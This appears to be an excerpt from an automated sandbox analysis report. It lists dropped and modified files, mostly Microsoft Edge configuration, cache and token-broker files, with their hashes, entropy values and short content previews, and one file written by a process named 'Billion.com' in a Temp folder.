                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):130439
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                        MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                        SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                        SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                        SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                        MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                        SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                        SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                        SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):57
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                        MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                        SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                        SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                        SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):29
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                        MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                        SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                        SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                        SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):575056
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                        SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                        MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                        SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                        SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                        SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):460992
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                        SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                        MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                        SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                        SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                        SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):9
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                        MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                        SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                        SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                        SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:uriCache_
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):179
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.0008771611613065
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQ+J:YWLSGTt1o9LuLgfGBPAzkVj/T8lQ+J
                                                                                                                                                                                                                                                                                                        MD5:B4FCDDC61D5B74EF98B0CD47B29AD141
                                                                                                                                                                                                                                                                                                        SHA1:FBC310CEC7CB4FAFAC9138167231FDF970B6A11E
                                                                                                                                                                                                                                                                                                        SHA-256:1FDB27B0FB7851DC15058F0ADE731F0876A43FB0E231F543CE61E2DD3B321B34
                                                                                                                                                                                                                                                                                                        SHA-512:C6565C3D37DE3F77BFDD71A31072F7468D2F4BFDE4D9AF2DCDCE505000309F87AFF3863BBF38C219934E2E27D38E432C1E0F0A068C4332D9B49671E3C597EF37
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735165705782207}]}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):86
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                                                        MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                                                        SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                                                        SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                                                        SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):44922
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.094890164157997
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWcBi1zNt9Xi9vV90D0sFLEVKJDSgzMMd6qD47u3+CO:+/Ps+wsI7ynEXi9t7KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:B6486EDCFE7EC256465FBD94C65151CC
                                                                                                                                                                                                                                                                                                        SHA1:6AB9889AA6D83CCFA04862D8E07DDCF31517038B
                                                                                                                                                                                                                                                                                                        SHA-256:3A90483165D0E00667819A4FC2921CD8DEE4CA876BFBA2225E8D5020BED5E26D
                                                                                                                                                                                                                                                                                                        SHA-512:6A051F288452EFCC863D1622BA82F279BB7C1A1F7AD47BCED199CAF09FA4FC12186FFC0AA823C80C77A1E103421CEE6C8984016715004FC82A1F67454B5CF503
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):46144
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0874474098903555
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:qMkbJrT8IeQc5dKH1ki1zNt9Xi9vVx+DzJ6PRLv9N2aPeCiozJDSgzMMd6qD47uW:qMk1rT8H1KzXi9tD98aPeFoztSmd6qEL
                                                                                                                                                                                                                                                                                                        MD5:9C9C3B1DF31DE1100253C096BFA50357
                                                                                                                                                                                                                                                                                                        SHA1:4E1893DCE27F314071091F3155E3FA5BB3E4DDE5
                                                                                                                                                                                                                                                                                                        SHA-256:9A2D4310003F537C6D1B9A3AFA34C46624D9795B3BEB914728E3D0D61F173949
                                                                                                                                                                                                                                                                                                        SHA-512:6641CE6FF4DE61580B16B60AE8D15B63FEE233809794B79193414D2E2F54851D9A1DE948999857099161198B4793C0FF52867C97291096F2E3C90623A4774240
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379538500667114","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"b801fd64-6919-4229-a38a-8914add27428"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):44930
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.095030682540709
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWcBi1zNt9Xi9vVxwxNQsPeGKJDSgzMMd6qD47u3+CO:+/Ps+wsI7ynEXi9t0KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:C5C719D948684AC649D09EBFD8719922
                                                                                                                                                                                                                                                                                                        SHA1:4E4278B3BDFD4A715FE933EE68F70CBC87CF20B9
                                                                                                                                                                                                                                                                                                        SHA-256:912D6E164AF3574D21FBB491572620C055842B1C0241E1C6A5D35964F2E9E2C2
                                                                                                                                                                                                                                                                                                        SHA-512:019A88D2522646436A138D847C37AF1406B493FE869EEFD10AEB83952EFAD7CA2B393A8001AF7B64E9EDA5F695615ABAACF30B6FFBCCBBE753EEF83244B80F0E
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2278
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.832920425157591
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:uiTrlKxrgxgJxl9Il8uwxYy50owhInigtpPhO0z794Fgtwed1rc:mxYCl0oDDhDz79ogtY
                                                                                                                                                                                                                                                                                                        MD5:AAD6DE7903575937FD8C6475F23AC1D8
                                                                                                                                                                                                                                                                                                        SHA1:843BAE1748ECE0D154475CA2442500C4DDAB44A2
                                                                                                                                                                                                                                                                                                        SHA-256:E9D2F47EDF284BA4527DA014C4EAD04DD0C9819C170136836C94DD97EADA1C28
                                                                                                                                                                                                                                                                                                        SHA-512:2B685CF246336DB37197F4FE3F809E63DAD336567C294938C29CA7458B035903FC2FF02C6FFB0E554057F32A475855119684CC719C7D5F184EA54C9BFC5066E2
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.L.y.p./.z.l.W.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.d.i.U.n.e.l.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):4622
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.998381659033429
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:uiTrlKxEx2xD9Il8uwHzRYHAShZjSUq86mIRlwR4SH939RAh2wpPSoGHIJRNqBq1:MYCHzWhZlQmIzTSHBG9pP1G2RNqELKU
                                                                                                                                                                                                                                                                                                        MD5:B8E320C662F6571ABD870518E1FA5B66
                                                                                                                                                                                                                                                                                                        SHA1:54D4085783ABB71B1D7F0196858AC76321824891
                                                                                                                                                                                                                                                                                                        SHA-256:AFCC40EC79AF85F89C67C40FA993243B00F1D9D8DD6479C69F905CAACA0FBFE3
                                                                                                                                                                                                                                                                                                        SHA-512:CBF715F0452C4D3479D6447E7AAD79B84F9E7F80447F1B0F40D49D5B52BD9CBCB9465C569467DA7A535C128AE12F8787160CA776ED7CE528EE7F1A2E09ECB9E2
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".Y.n.Y.r.5.T.F.W.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.d.i.U.n.e.l.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2684
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.9015110636720447
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:uiTrlKx68Wa7xDxl9Il8uwyprMm2YnAcRst9WyYAvCBURb406yg4d/vc:a9YC6rlbpRKPfCyRkby8
                                                                                                                                                                                                                                                                                                        MD5:76E7159FD85A75AD5207A5F490638838
                                                                                                                                                                                                                                                                                                        SHA1:BCD064F8E6548AB9E920CF87ECA02154AA176339
                                                                                                                                                                                                                                                                                                        SHA-256:74EA6E01B36C31DCB9702F52FA3B773B1825DD5CB5B4E5550A2649D62D6A189B
                                                                                                                                                                                                                                                                                                        SHA-512:C51C3FB9B491552A2074D7D5C8F49C54860C51E21BE5581095816A078104F7FC32F4D773927885D52161AC6E4BEE49674664C494814996E3E49932296B1451C9
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".i.R.T.w.F.A.N.1.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.d.i.U.n.e.l.
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3500
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.39890703624068
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:6NnCmHCZNnCGyqyAbCGyjNnC019C0TNnCBdgECnXNnC8CsNnCwDCqNnCEwC3NnCB:6N+NQNHzTNqsNXNHnNlBN0
                                                                                                                                                                                                                                                                                                        MD5:5099EB601185ECCA2BA0A40DBEF17143
                                                                                                                                                                                                                                                                                                        SHA1:5D976D38761BBEC3F5F823481883871EF0B9D037
                                                                                                                                                                                                                                                                                                        SHA-256:AD86618A86D0BCDFDF78321F39EDE0343E194B49FD5402F937DCB1DDD860DCD6
                                                                                                                                                                                                                                                                                                        SHA-512:4FDACE36C8575F0E4B336E629DCAF2AE655A5E4D6407A28D2DECF96E26727E8046F9AD9059D6A713A904A304CC26F37E569643029BA6CC4CDA675A9A7E4EEE64
                                                                                                                                                                                                                                                                                                        Malicious:false
